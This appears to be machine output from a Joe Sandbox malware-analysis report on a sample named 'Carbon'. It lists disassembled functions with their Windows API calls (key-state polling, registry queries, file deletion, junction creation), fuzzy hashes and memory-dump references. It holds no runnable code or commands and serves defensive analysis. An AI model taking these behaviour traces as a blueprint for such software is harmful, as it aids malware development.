                                                            • API String ID: 1431749950-0
                                                            • Opcode ID: c80c030a4c6ec87e920ed35b419ba0d8a97a1b561e20ad6331108d9330381186
                                                            • Instruction ID: 170074ffa6480eeae2a433ebb051f9c581117f640df9af81abd14c530ce88ddf
                                                            • Opcode Fuzzy Hash: c80c030a4c6ec87e920ed35b419ba0d8a97a1b561e20ad6331108d9330381186
                                                            • Instruction Fuzzy Hash: 44F03171604209BFCB04EB65DC46E9F7BACEF85720F000055F505DB361EAB4AE81CB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00923179,00000001,00000364,?,?,?,0000000A,00000000), ref: 0092500E
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 9363b808d0b94eef8e1a6f83280d4e3075f9e1723c2e7dbc10748ddfba386f14
                                                            • Instruction ID: 670f77ac8f5bef8cdd246d54702dae64396f9d5af05cbfead3c4769ab3cfb591
                                                            • Opcode Fuzzy Hash: 9363b808d0b94eef8e1a6f83280d4e3075f9e1723c2e7dbc10748ddfba386f14
                                                            • Instruction Fuzzy Hash: 71F0E931659935A7EB215F22BC05F9A374CBFC2760B178021B81DD6198CA30DC0097F1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,00916A59,?,0000015D,?,?,?,?,00918590,000000FF,00000000,?,?), ref: 00923BA2
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: c74de11d67666a82b366a648193c832dca7efa62310cf50e8b64bc728477a396
                                                            • Instruction ID: 31058e15f42809ee6a936e2f7a75c4063b9cd514c1838579dc819972a32de318
                                                            • Opcode Fuzzy Hash: c74de11d67666a82b366a648193c832dca7efa62310cf50e8b64bc728477a396
                                                            • Instruction Fuzzy Hash: 86E02B35214634A6E6212F26FC04F7A375DEF81BB0F078121EC51A20D8DF2CCE0086E1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d2a1e1f298631700afb6f829bdf9a2e8a71e4627c2f2f67f89eaefb80f8b4297
                                                            • Instruction ID: 8a74b58ddbb523a727ba5778972b2b67d8fe2078f30eceeeb65ffa7a6d1eed5d
                                                            • Opcode Fuzzy Hash: d2a1e1f298631700afb6f829bdf9a2e8a71e4627c2f2f67f89eaefb80f8b4297
                                                            • Instruction Fuzzy Hash: 59F039B1505B19CFCB349F74E494826BBE5FF183293248A3EE2D686621C731A884DF40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            • Opcode ID: 2b7a730b7d10054f7affbdf7b4fabb28a369bbe9d4b1d5084a9765edfbbbd767
                                                            • Instruction ID: 32e0009ce5b7fb53793416e2c192f3defdbf1bd980b168746e94544b2f8b8e6f
                                                            • Opcode Fuzzy Hash: 2b7a730b7d10054f7affbdf7b4fabb28a369bbe9d4b1d5084a9765edfbbbd767
                                                            • Instruction Fuzzy Hash: 7FF02B71B08A045FE7306BB49805F65F7D8FF80310F14491AD8CAC21C2D3BA54D0A7A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock
                                                            • String ID:
                                                            • API String ID: 2638373210-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • Shell_NotifyIconW.SHELL32(00000002,?), ref: 008F2F70
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_
                                                            • String ID:
                                                            • API String ID: 1144537725-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID:
                                                            • API String ID: 176396367-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 008F31A9
                                                              • Part of subcall function 008F7467: _wcslen.LIBCMT ref: 008F747A
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: LongNamePath_wcslen
                                                            • String ID:
                                                            • API String ID: 541455249-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 008F3989: Shell_NotifyIconW.SHELL32(00000000,?), ref: 008F3A5A
                                                              • Part of subcall function 008FDCC0: GetInputState.USER32 ref: 008FDDA7
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 008F2853
                                                              • Part of subcall function 008F2F14: Shell_NotifyIconW.SHELL32(00000002,?), ref: 008F2F70
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                            • String ID:
                                                            • API String ID: 3667716007-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • FindCloseChangeNotification.KERNEL32(?,?,?,008F32C7), ref: 008F6923
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: ChangeCloseFindNotification
                                                            • String ID:
                                                            • API String ID: 2591292051-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0095D801,?,?), ref: 0095D897
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: CopyFile
                                                            • String ID:
                                                            • API String ID: 1304948518-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,00000000,?,00930A57,?,?,00000000,?,00930A57,00000000,0000000C), ref: 0093070A
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetFileAttributesW.KERNEL32(?,0095D57A), ref: 0095E7DB
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 008F1736
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: InfoParametersSystem
                                                            • String ID:
                                                            • API String ID: 3098949447-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0095D98E: FindFirstFileW.KERNEL32(?,?), ref: 0095DA05
                                                              • Part of subcall function 0095D98E: DeleteFileW.KERNEL32(?,?,?,?), ref: 0095DA55
                                                              • Part of subcall function 0095D98E: FindNextFileW.KERNEL32(00000000,00000010), ref: 0095DA66
                                                              • Part of subcall function 0095D98E: FindClose.KERNEL32(00000000), ref: 0095DA7D
                                                            • GetLastError.KERNEL32 ref: 00966398
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                            • String ID:
                                                            • API String ID: 2191629493-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 009644AF
                                                            • _wcslen.LIBCMT ref: 009644DC
                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0096450C
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0096452D
                                                            • RemoveDirectoryW.KERNEL32(?), ref: 0096453D
                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 009645C4
                                                            • CloseHandle.KERNEL32(00000000), ref: 009645CF
                                                            • CloseHandle.KERNEL32(00000000), ref: 009645DA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                            • String ID: :$\$\??\%s
                                                            • API String ID: 1149970189-3457252023
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0097D11F: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0097BE35,?,?), ref: 0097D13C
                                                              • Part of subcall function 0097D11F: _wcslen.LIBCMT ref: 0097D178
                                                              • Part of subcall function 0097D11F: _wcslen.LIBCMT ref: 0097D1E6
                                                              • Part of subcall function 0097D11F: _wcslen.LIBCMT ref: 0097D21C
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0097C6C5
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0097C730
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0097C754
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0097C7B3
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0097C86E
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0097C8DB
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0097C970
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0097C9C1
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0097CA6A
                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0097CB09
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0097CB16
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                            • String ID:
                                                            • API String ID: 3102970594-0
                                                            • Opcode ID: 593a89e24ebe67b344a266dd983d3d4fee25788b3feb7b3bd8046ab3c32b6829
                                                            • Instruction ID: 4ea624f83a61b1bf484832831009be311e3cc9f7cf77f99b8f2c99fc32410cd9
                                                            • Opcode Fuzzy Hash: 593a89e24ebe67b344a266dd983d3d4fee25788b3feb7b3bd8046ab3c32b6829
                                                            • Instruction Fuzzy Hash: FA022CB16042049FD714DF28C895E2ABBE5FF88314F18C49DE549DB2A2DB31ED46CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 0095A397
                                                            • GetAsyncKeyState.USER32(000000A0), ref: 0095A418
                                                            • GetKeyState.USER32(000000A0), ref: 0095A433
                                                            • GetAsyncKeyState.USER32(000000A1), ref: 0095A44D
                                                            • GetKeyState.USER32(000000A1), ref: 0095A462
                                                            • GetAsyncKeyState.USER32(00000011), ref: 0095A47A
                                                            • GetKeyState.USER32(00000011), ref: 0095A48C
                                                            • GetAsyncKeyState.USER32(00000012), ref: 0095A4A4
                                                            • GetKeyState.USER32(00000012), ref: 0095A4B6
                                                            • GetAsyncKeyState.USER32(0000005B), ref: 0095A4CE
                                                            • GetKeyState.USER32(0000005B), ref: 0095A4E0
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            • Opcode ID: b290c05e7518b5f77101cb9d20bcc42c513db96bfa1313d904ffa7b31d4a941c
                                                            • Instruction ID: 3b2c32415c0e1a95fc314eddc5065ed07e95088210d7cf84927e810995a5fe13
                                                            • Opcode Fuzzy Hash: b290c05e7518b5f77101cb9d20bcc42c513db96bfa1313d904ffa7b31d4a941c
                                                            • Instruction Fuzzy Hash: AA41F9305047C96DFF31DAA688087A6BEA86F11305F048259DDC6462D2EBE89DCCC767
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 008FA1D4: _wcslen.LIBCMT ref: 008FA1DE
                                                            • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 0096A2E7
                                                            • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 0096A3FA
                                                              • Part of subcall function 00963FE3: GetInputState.USER32 ref: 0096403A
                                                              • Part of subcall function 00963FE3: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009640D5
                                                            • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 0096A317
                                                            • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 0096A3E4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                            • String ID: *.*
                                                            • API String ID: 1972594611-438819550
                                                            • Opcode ID: 12c6cf8f35487cb2c82bb3381000d0d5b9e22daf33f32fee9d02245ce3f267b1
                                                            • Instruction ID: 06c7bfc883798e3a29e52b2308798e921788183553401b7cd934e268d23896a8
                                                            • Opcode Fuzzy Hash: 12c6cf8f35487cb2c82bb3381000d0d5b9e22daf33f32fee9d02245ce3f267b1
                                                            • Instruction Fuzzy Hash: 90416C71940209AFCF14EFA4CD49AEEBBB8FF05320F204056E805B2291E7309E85CF62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                            • String ID:
                                                            • API String ID: 292994002-0
                                                            • Opcode ID: dbd768eebe08ffe75fd505a4f54465e892a24b9e3a2b822db6a586b10455317f
                                                            • Instruction ID: 970b6f7e5bc10da456a8d60291cfa5757cdb089bf5d16050d9a94c0a433193ce
                                                            • Opcode Fuzzy Hash: dbd768eebe08ffe75fd505a4f54465e892a24b9e3a2b822db6a586b10455317f
